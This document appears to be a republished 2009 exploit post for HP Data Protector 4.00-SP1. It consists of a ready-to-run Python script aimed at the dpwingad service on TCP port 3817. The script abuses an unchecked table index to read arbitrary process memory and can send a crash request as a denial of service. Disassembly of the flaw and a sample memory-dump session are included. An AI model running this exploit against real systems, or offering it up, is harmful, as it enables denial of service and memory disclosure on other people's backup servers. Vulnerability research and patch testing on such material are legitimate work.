HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos Exploit
来源:www.vfocus.net 作者:Nibin 发布时间:2009-06-24  
#!/usr/bin/env python

#POC Memory disclosure/ Denial Of Service
#HP Data protector 4.00-sp1 43064
#Tested for Windows Version Only


'''
Vulnerable code: the dpwinsup module of the dpwingad process, which listens on
3817/TCP (the author's reference for the routine: dpwinsup.10275F80).  A DWORD
copied out of the client request is used, without any bounds check, as an index
into a table at 0x1022A4F0.  An out-of-range index either makes the process
read arbitrary memory -- which this script reads back out of the reply
(information disclosure) -- or fault on an unmapped address (denial of service).

100DDE89   8B15 54A72210    MOV EDX,DWORD PTR DS:[1022A754] 
100DDE8F   8B82 98650000    MOV EAX,DWORD PTR DS:[EDX+6598]
100DDE95   8B4C24 54        MOV ECX,DWORD PTR SS:[ESP+54] ;ECX = user controlled data
100DDE99   8D1481           LEA EDX,DWORD PTR DS:[ECX+EAX*4] ;EDX = if invalid/valid offset        
100DDE9C   8B3495 F0A42210  MOV ESI,DWORD PTR DS:[EDX*4+1022A4F0] ;Crash/Memory Leak     
100DDEA3   83C4 1C          ADD ESP,1C
100DDEA6   897424 10        MOV DWORD PTR SS:[ESP+10],ESI

Effective address of the load: 0x1022A4F0 + 4*(ECX + 4*EAX).  exploit_memory()
below derives ECX on the assumption that EAX ([EDX+6598]) is 1 on the tested
build; if a dump looks shifted by a few DWORDs, check that value first.
'''

import socket
import sys
import struct
import time
import getopt

# Request template shared by both PoCs: four little-endian DWORDs followed by
# the placeholder "data", which callers swap for 130 "A" bytes.  The last
# DWORD, 0x92 = 146 = 16 + 130, equals the size of the finished request, so it
# is probably a length field (unverified).  The DWORD that exploit_memory()
# patches in at offset 32 lands inside the "A" padding.
bf = (
    "\x54\x84\x00\x00"   # 0x00008454
    "\x00\x00\x00\x00"   # 0
    "\x06\x00\x00\x00"   # 6
    "\x92\x00\x00\x00"   # 0x92 -- matches len(header) + 130
    "data"               # placeholder for the payload
)


# Lab defaults.  main() takes the real target from -t; only `port` is read by
# the exploit functions below.
ip = "192.168.0.14"
port = 3817                # dpwingad listener
addr = (ip, port)          # kept for callers; the functions build their own tuple
# First address of the 0x50-byte dump made by "-e 1".  The author labels it the
# PEB on 32-bit Windows (the fixed pre-ASLR location).  NOTE(review): the
# sample dump at the bottom of the file has a self-pointer at +0x18 and
# stack-looking values at +0x04/+0x08, which is how a TEB's NT_TIB starts --
# verify which structure actually lives here on the target.
mem_addr = 0x7FFDF000
DEBUG = False              # True: hexdump every reply inside exploit_memory()


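def exploit_memory(ip_addr, read_mem, timeout=10.0):
    """Leak one DWORD of the target process's memory and return it as an int.

    The request template ``bf`` is sent with its 4-byte field at offset 32
    replaced by a table index.  Per the disassembly at the top of the file the
    daemon loads ``[0x1022A4F0 + 4*(index + 4*EAX)]`` with no bounds check,
    and the loaded value comes back in bytes 32..36 of the reply, so an index
    chosen to land on ``read_mem`` discloses that DWORD.  The index formula
    assumes EAX is 1 on the tested build.

    ip_addr  -- target host; the port is the module-level ``port``.
    read_mem -- 4-byte-aligned address to read.
    timeout  -- socket timeout in seconds, so a wedged daemon (for instance
                one the DoS path already crashed) cannot hang the dump.

    Raises ValueError for a misaligned address, RuntimeError when the reply
    is too short to hold the leaked DWORD, and socket.error / socket.timeout
    on connection problems.  The socket is always closed.
    """
    table = 0x1022A4F0
    if (read_mem - table) % 4:
        raise ValueError("read_mem must be 4-byte aligned: 0x%x" % read_mem)
    # Index such that table + 4*(index + 4) == read_mem.  Masked to 32 bits so
    # addresses below the table work too: the CPU wraps the same computation.
    t = ((read_mem - table) // 4 - 4) & 0xFFFFFFFF
    print("0x%x" % t)

    reqst = bf.replace("data", "A" * 130)
    reqst = reqst[0:32] + struct.pack("<L", t) + reqst[36:]

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((ip_addr, port))
        s.sendall(reqst)
        resp = s.recv(1000)
    finally:
        s.close()

    if DEBUG:
        _hexdump(resp)

    # A short or empty reply used to surface as a bare struct.error; say why.
    if len(resp) < 36:
        raise RuntimeError("short reply (%d bytes) from %s:%d - no DWORD at offset 32"
                           % (len(resp), ip_addr, port))
    return struct.unpack("<L", resp[32:36])[0]


def _hexdump(data):
    """Print ``data`` as 16 "0x%02x" octets per line (DEBUG aid only)."""
    print("Len of resp: %d" % len(data))
    octets = bytearray(data)
    for off in range(0, len(octets), 16):
        print(" ".join("0x%02x" % b for b in octets[off:off + 16]))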

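def dos_yosemite(ip_addr, timeout=10.0):
    """Send the crash request and return without waiting for a reply.

    The payload is ``bf`` padded with 130 "A" bytes, so the index field at
    offset 32 is 0x41414141.  The disassembly at the top of the file marks the
    load that uses this index as the crash site, so an index that far out of
    range is expected to fault dpwingad.  Nothing is read back because the
    service is not expected to answer.

    ip_addr -- target host; the port is the module-level ``port``.
    timeout -- socket timeout in seconds so connect()/send() cannot hang on a
               host that is already down.  The socket is always closed.
    """
    print("[*] Sending DOS Exploit.")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((ip_addr, port))
        s.sendall(bf.replace("data", "A" * 130))
    finally:
        s.close()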

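def main():
    """Parse ``-t/--target`` and ``-e/--exploit`` and run the selected PoC.

    Options are collected first and dispatched afterwards, so the order on the
    command line no longer matters: the original nested-loop version reported
    "Target Missing" for ``-e 1 -t HOST`` because it looked for -t only in the
    options that happened to precede -e.  A non-numeric -e value and a missing
    -e are also reported instead of raising or silently returning.

    Exit codes: 2 on a getopt error, 0 otherwise.
    """
    try:
        opt, _args = getopt.getopt(sys.argv[1:], "ht:e:",
                                   ["help", "target=", "exploit="])
    except getopt.GetoptError as err:
        print(str(err))
        usage()
        sys.exit(2)
    if not opt:
        usage()
        sys.exit(0)

    target = None
    mode = None
    for o, a in opt:
        if o in ("-h", "--help"):
            usage()
            sys.exit()
        elif o in ("-t", "--target"):
            target = a
        elif o in ("-e", "--exploit"):
            mode = a

    if mode is None:
        # Only -t given: nothing to run.
        usage()
        sys.exit()
    if target is None:
        print("[*] Target Missing")
        usage()
        sys.exit()
    try:
        mode = int(mode)
    except ValueError:
        print("[*] Unknown Exploit type")
        usage()
        sys.exit()

    if mode == 0:
        dos_yosemite(target)
        sys.exit(0)
    elif mode == 1:
        print("[*] Dumping Memory..{PEB}")
        # PoC: read 0x50 bytes, one DWORD per request, with a short pause
        # between requests as the original did.
        for i in range(0, 0x50, 4):
            leak = exploit_memory(target, mem_addr + i)
            time.sleep(0.5)
            print("0x%08x ---> 0x%08x" % (mem_addr + i, leak))
        sys.exit()
    else:
        print("[*] Unknown Exploit type")
        usage()
        sys.exit()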
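def usage_text():
    """Return the help text that ``usage()`` prints.

    The text ends with a blank line; ``print`` adds the final newline, which
    reproduces the original's trailing ``print "\\n"`` exactly.
    """
    return (
        "Yosemite DoS and Information Disclosure Exploit\n"
        "Available Options\n"
        "\t -t | --target     target address\n"
        # "\\ " keeps the original backslash in the output; the original wrote
        # it as the invalid escape "\ ", which newer interpreters warn about.
        "\t -e | --exploit    { 0 - Dos \\ 1 - Memory Leak }\n"
        "\n"
    )


def usage():
    """Print the command-line help to stdout."""
    print(usage_text())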
# Script entry point; importing the module runs nothing.
if __name__ == "__main__":
    main()
   
# Sample session from the author's lab host.  NOTE(review): inferred from the
# values only -- the dump has a self-pointer at +0x18 (0x7ffdf000), stack-
# looking values at +0x04/+0x08 and another 0x7ffd.... pointer at +0x30, which
# is how a TEB's NT_TIB starts rather than a PEB; the "{PEB}" label may be
# mislabelled.  Verify against the target before relying on these offsets.
'''
C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 1
[*] Dumping Memory..{PEB}
0x7ffdf000 ---> 0x0012fbc4
0x7ffdf004 ---> 0x00130000
0x7ffdf008 ---> 0x0012d000
0x7ffdf00c ---> 0x00000000
0x7ffdf010 ---> 0x00001e00
0x7ffdf014 ---> 0x00000000
0x7ffdf018 ---> 0x7ffdf000
0x7ffdf01c ---> 0x00000000
0x7ffdf020 ---> 0x00000c54
0x7ffdf024 ---> 0x00000cfc
0x7ffdf028 ---> 0x00000000
0x7ffdf02c ---> 0x00000000
0x7ffdf030 ---> 0x7ffdb000
0x7ffdf034 ---> 0x00000000
0x7ffdf038 ---> 0x00000000
0x7ffdf03c ---> 0x00000000
0x7ffdf040 ---> 0xe15b42a0
0x7ffdf044 ---> 0x00000000
0x7ffdf048 ---> 0x00000000
0x7ffdf04c ---> 0x00000000

C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 0
[*] Sending DOS Exploit.
'''

 